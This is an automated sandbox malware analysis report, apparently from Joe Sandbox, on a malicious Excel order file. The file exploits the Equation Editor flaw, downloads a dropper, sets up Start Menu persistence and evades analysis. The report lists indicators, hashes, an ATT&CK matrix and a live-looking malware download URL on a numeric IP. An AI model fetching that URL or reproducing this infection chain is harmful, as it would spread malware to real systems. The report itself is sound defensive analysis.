    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040344A
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404CED5_2_00404CED
    Source: C:\Users\Public\vbc.exeCode function: 5_2_004068DA5_2_004068DA
    Source: C:\Users\Public\vbc.exeProcess Stats: CPU usage > 98%
    Source: ACP-2210825ORDER.xlsOLE indicator, VBA macros: true
    Source: ~DF688530565CAD41F4.TMP.0.drOLE indicator, VBA macros: true
    Source: libgiognutls.dll.5.drStatic PE information: Number of sections : 11 > 10
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 77620000 page execute and read and writeJump to behavior
    Source: C:\Users\Public\vbc.exeMemory allocated: 77740000 page execute and read and writeJump to behavior
    Source: ACP-2210825ORDER.xlsVirustotal: Detection: 26%
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
    Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe"
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040344A
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR8371.tmpJump to behavior
    Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@4/20@0/1
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00402104 CoCreateInstance,5_2_00402104
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00404771 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,5_2_00404771
    Source: ACP-2210825ORDER.xlsOLE indicator, Workbook stream: true
    Source: ~DF688530565CAD41F4.TMP.0.drOLE indicator, Workbook stream: true
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: ACP-2210825ORDER.xlsStatic file information: File size 1130496 > 1048576
    Source: ACP-2210825ORDER.xlsInitial sample: OLE indicators encrypted = True

    Data Obfuscation

    barindex
    Source: Yara matchFile source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10002DE0 push eax; ret 5_2_10002E0E
    Source: libgiognutls.dll.5.drStatic PE information: section name: .xdata
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_10001B18
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\VBC[1].exeJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dllJump to dropped file
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_035406CF URLDownloadToFileW,ShellExecuteW,ExitProcess,2_2_035406CF
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

    Boot Survival

    barindex
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93Jump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Obeyeo.BibJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\VatersotigesJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\KnoglemarvsundersgelsenJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\ArmoniacJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to behavior
    Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\Urokkeligheden.Ord114Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000030C53D8 second address: 00000000030C53D8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007F2BE4B89A38h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test al, 39h 0x0000000a rdtsc
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1488Thread sleep time: -240000s >= -30000sJump to behavior
    Source: C:\Users\Public\vbc.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dllJump to dropped file
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00406555 FindFirstFileW,FindClose,5_2_00406555
    Source: C:\Users\Public\vbc.exeCode function: 5_2_00405A03 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,5_2_00405A03
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040287E FindFirstFileW,5_2_0040287E
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-558
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEAPI call chain: ExitProcess graph end nodegraph_2-616
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_5-4321
    Source: C:\Users\Public\vbc.exeAPI call chain: ExitProcess graph end nodegraph_5-4479
    Source: vbc.exe, 00000005.00000002.1184749045.00000000002E4000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
    Source: C:\Users\Public\vbc.exeCode function: 5_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,5_2_10001B18
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXECode function: 2_2_03540729 mov edx, dword ptr fs:[00000030h]2_2_03540729
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe "C:\Users\Public\vbc.exe" Jump to behavior
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Users\Public\vbc.exeCode function: 5_2_0040344A EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,5_2_0040344A
    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Scripting
    1
    Registry Run Keys / Startup Folder
    1
    Access Token Manipulation
    111
    Masquerading
    OS Credential Dumping11
    Security Software Discovery
    Remote Services1
    Archive Collected Data
    Exfiltration Over Other Network Medium1
    Encrypted Channel
    Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
    System Shutdown/Reboot
    Default Accounts1
    Native API
    Boot or Logon Initialization Scripts11
    Process Injection
    1
    Disable or Modify Tools
    LSASS Memory1
    Virtualization/Sandbox Evasion
    Remote Desktop Protocol1
    Clipboard Data
    Exfiltration Over Bluetooth33
    Ingress Tool Transfer
    Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts22
    Exploitation for Client Execution
    Logon Script (Windows)1
    Registry Run Keys / Startup Folder
    1
    Virtualization/Sandbox Evasion
    Security Account Manager1
    Remote System Discovery
    SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
    Non-Application Layer Protocol
    Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Access Token Manipulation
    NTDS2
    File and Directory Discovery
    Distributed Component Object ModelInput CaptureScheduled Transfer21
    Application Layer Protocol
    SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
    Process Injection
    LSA Secrets15
    System Information Discovery
    SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common11
    Scripting
    Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup Items1
    Obfuscated Files or Information
    DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    ACP-2210825ORDER.xls27%VirustotalBrowse
    ACP-2210825ORDER.xls100%AviraEXP/CVE-2017-11882.Gen
    SourceDetectionScannerLabelLink
    C:\Users\user\AppData\Local\Temp\~DF688530565CAD41F4.TMP100%AviraEXP/CVE-2017-11882.Gen
    C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dll2%ReversingLabs
    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac\libgiognutls.dll0%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://172.245.34.91/5643/VBC.exej0%Avira URL Cloudsafe
    http://172.245.34.91/5643/VBC.exel0%Avira URL Cloudsafe
    http://172.245.34.91/5643/VBC.exehhC:0%Avira URL Cloudsafe
    http://172.245.34.91/5643/VBC.exe100%Avira URL Cloudmalware
    No contacted domains info
    NameMaliciousAntivirus DetectionReputation
    http://172.245.34.91/5643/VBC.exetrue
    • Avira URL Cloud: malware
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://172.245.34.91/5643/VBC.exejEQNEDT32.EXE, 00000002.00000002.973646300.0000000003540000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://172.245.34.91/5643/VBC.exelEQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://nsis.sf.net/NSIS_ErrorErrorvbc.exe, 00000005.00000000.972752433.000000000040A000.00000008.00000001.01000000.00000004.sdmp, vbc.exe, 00000005.00000002.1185344377.000000000040A000.00000004.00000001.01000000.00000004.sdmp, vbc.exe.2.dr, VBC[1].exe.2.drfalse
      high
      http://172.245.34.91/5643/VBC.exehhC:EQNEDT32.EXE, 00000002.00000002.973393132.000000000065F000.00000004.00000020.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      172.245.34.91
      unknownUnited States
      36352AS-COLOCROSSINGUStrue
      Joe Sandbox Version:36.0.0 Rainbow Opal
      Analysis ID:755822
      Start date and time:2022-11-29 08:11:40 +01:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 5m 57s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:ACP-2210825ORDER.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:7
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • GSI enabled (VBA)
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.troj.expl.evad.winXLS@4/20@0/1
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 85.8% (good quality ratio 84.3%)
      • Quality average: 87.7%
      • Quality standard deviation: 21.4%
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 70
      • Number of non-executed functions: 27
      Cookbook Comments:
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtSetInformationFile calls found.
      TimeTypeDescription
      08:12:45API Interceptor102x Sleep call for process: EQNEDT32.EXE modified
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      AS-COLOCROSSINGUShttps://hotelsmag.com/newsGet hashmaliciousBrowse
      • 144.168.212.107
      (RSV) .xlsGet hashmaliciousBrowse
      • 104.168.45.104
      NEW ORDER 40 container+MUSTANG.xlsGet hashmaliciousBrowse
      • 172.245.142.71
      NEW ORDER 40 container+MUSTANG.xlsGet hashmaliciousBrowse
      • 172.245.142.71
      New_order.xlsGet hashmaliciousBrowse
      • 198.46.178.149
      Product Enquiry.xlsGet hashmaliciousBrowse
      • 172.245.25.166
      Rappaport .xlsGet hashmaliciousBrowse
      • 104.168.45.104
      http://deswin.nl/kgd0bGet hashmaliciousBrowse
      • 23.94.186.186
      produkta aptauja.xlsGet hashmaliciousBrowse
      • 172.245.25.166
      Order.xlsGet hashmaliciousBrowse
      • 198.46.178.149
      88xv2Mk9gR.exeGet hashmaliciousBrowse
      • 192.3.110.135
      SOA 210233.xlsGet hashmaliciousBrowse
      • 192.3.101.26
      RFQ MR 27138.xlsGet hashmaliciousBrowse
      • 192.3.101.26
      CUSTOM CLEARNCE FORM E.xlsGet hashmaliciousBrowse
      • 192.3.101.26
      swift copy.xlsGet hashmaliciousBrowse
      • 172.245.25.166
      FORM E CUSTOM CLEARANCE.xlsGet hashmaliciousBrowse
      • 192.3.101.26
      rI7ZEuyP9n.exeGet hashmaliciousBrowse
      • 198.12.91.245
      swiftX24-11-2022.xlsGet hashmaliciousBrowse
      • 192.3.101.138
      8Wdhve67B9.exeGet hashmaliciousBrowse
      • 198.12.91.245
      Order.xlsGet hashmaliciousBrowse
      • 198.46.178.149
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      C:\Users\user\AppData\Local\Temp\nsp5B93.tmp\System.dllServices_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
        Services_Jingce_Quotation28112022.exeGet hashmaliciousBrowse
          98765434567890.exeGet hashmaliciousBrowse
            98765434567890.exeGet hashmaliciousBrowse
              ORI-0876543200987 (1).exeGet hashmaliciousBrowse
                DC-098432345678909 (2).exeGet hashmaliciousBrowse
                  ORI-0876543200987 (1).exeGet hashmaliciousBrowse
                    DC-098432345678909 (2).exeGet hashmaliciousBrowse
                      https://repo.anaconda.com/miniconda/Miniconda3-py39_4.12.0-Windows-x86_64.exeGet hashmaliciousBrowse
                        uWoMvSzdog.exeGet hashmaliciousBrowse
                          uWoMvSzdog.exeGet hashmaliciousBrowse
                            RFQ.exeGet hashmaliciousBrowse
                              RFQ.exeGet hashmaliciousBrowse
                                21831nRdnc.exeGet hashmaliciousBrowse
                                  21831nRdnc.exeGet hashmaliciousBrowse
                                    RFQ1258966.xlsGet hashmaliciousBrowse
                                      Factura.exeGet hashmaliciousBrowse
                                        Factura.exeGet hashmaliciousBrowse
                                          Qoute for 04261LOMO-01418-LALIZAS UAE.exeGet hashmaliciousBrowse
                                            Qoute for 04261LOMO-01418-LALIZAS UAE.exeGet hashmaliciousBrowse
                                              Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Category:dropped
                                              Size (bytes):477800
                                              Entropy (8bit):7.505402259729816
                                              Encrypted:false
                                              SSDEEP:12288:Lz772qgvq2nLm4W2RPLKb+nFzIQ3Ja8TA:gXnS4W2RPLKm/of
                                              MD5:7081C4822CF1C7572DD82822B8F27C49
                                              SHA1:4EE3B6C423B1C9EBF5BEFBC73D1EEF0C576CF026
                                              SHA-256:B5330F82F3C5C3F223AE9DECD3EBDCD74D1A13D95B1C42BD7B2DE4E6C6CB0083
                                              SHA-512:6E3377E6A47518F2267CD38646E2CEC576D41FD8A67C8C2590F43BF353C0B1F322FC229E70BC98E9C7DFAA1A11CF872A0C8E2C15A31EE90EF1C4E65EAC98EE3A
                                              Malicious:true
                                              Reputation:low
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1..P...P...P..*_...P...P..OP..*_...P..s...P...V...P..Rich.P..........PE..L...8.MX.................b...*......J4............@..........................p............@.............................................h............5..X............................................................................................text....a.......b.................. ..`.rdata...............f..............@..@.data...8............z..............@....ndata...0...............................rsrc...h...........................@..@................................................................................................................................................................................................................................................................................................................................................................
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):4056
                                              Entropy (8bit):1.929653848333741
                                              Encrypted:false
                                              SSDEEP:12:YB1uOUvJqRENEtEtEdEdEdEO6Mcs/vs9/09v89fE9vM9/U9Lzlm97z9m9Lz1m9bO:Y7uTvJqRiGGWWWRKqurbkdBvae
                                              MD5:4A103FC1809C8EA381D2ACB5380EF4F6
                                              SHA1:6C81D37798C4D78C64E7D3EF7EB2ACB317C9FF67
                                              SHA-256:1AB8F5ABD845FFD0C61A61BB09BFCF20569B80B4496BCCB58C623753CF40485C
                                              SHA-512:77DA8AB022505D77F89749E97628CAF4DD8414251CB673598ACBA8F7D30D1889037FAB30094A6CE7DC47293697A6BEF28B92364D00129B59D2FC3711C82650F5
                                              Malicious:false
                                              Reputation:moderate, very likely benign file
                                              Preview:....l...........0...............C'...... EMF................................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1......."...........!...............................................1.......'.......................%...........................................................&...........................%...........................6.......0.......%...........L...d.........../...............0.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):17500
                                              Entropy (8bit):2.2677225081522296
                                              Encrypted:false
                                              SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
                                              MD5:5A977E68E4AD913CC2A9FC917F1CA510
                                              SHA1:D68C009CC5EE57A931D1BB1D062294F319C03183
                                              SHA-256:82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
                                              SHA-512:71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
                                              Malicious:false
                                              Reputation:low
                                              Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):17500
                                              Entropy (8bit):2.2677225081522296
                                              Encrypted:false
                                              SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/ECl0jp2iGGWWWZmCI8bo+BvWbkmIg:d0stoE4
                                              MD5:5A977E68E4AD913CC2A9FC917F1CA510
                                              SHA1:D68C009CC5EE57A931D1BB1D062294F319C03183
                                              SHA-256:82CAABC053EAB9A6F6A826A3FEA7EC1D834A053268B516E8CB81B5B0B161FD73
                                              SHA-512:71C40805CE1E750B1158356834D9EA8902B4D5A1BDA91A11DBB154FE1480FCDC4C51C8E6E82C985D8F563777B2F21775A23DA5E0794843EC88E6F64195169971
                                              Malicious:false
                                              Reputation:low
                                              Preview:....l...........`...0...........uN..p... EMF....\D..........................8...X....................?......F...,... ...EMF+.@..................x...x...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........................................................!......."...........!......."...........................!..............................."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1..."...........!...............................................a...1...'.......................%...........................................................&...........................%...........................6.......`.......%...........L...d..........._...............`.......!...
                                              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                              Category:dropped
                                              Size (bytes):17500
                                              Entropy (8bit):2.2754571047715912
                                              Encrypted:false
                                              SSDEEP:96:uRiEE000XyDcvSRiGGWWWRNN/uf2iGGWWWZmCI8bUaBvWbkmIg:d0EUI4
                                              MD5:38A09794AE082E08EA4F8B6E517F4814
                                              SHA1:8B7DF3EE701A7E43BBD9A1AC03A7C342FDB4F2B5
                                              SHA-256:22A5F86B243A131E89E06FF0FA824A09369D1878DC1F1C4E3527FFDDBEFF70F3
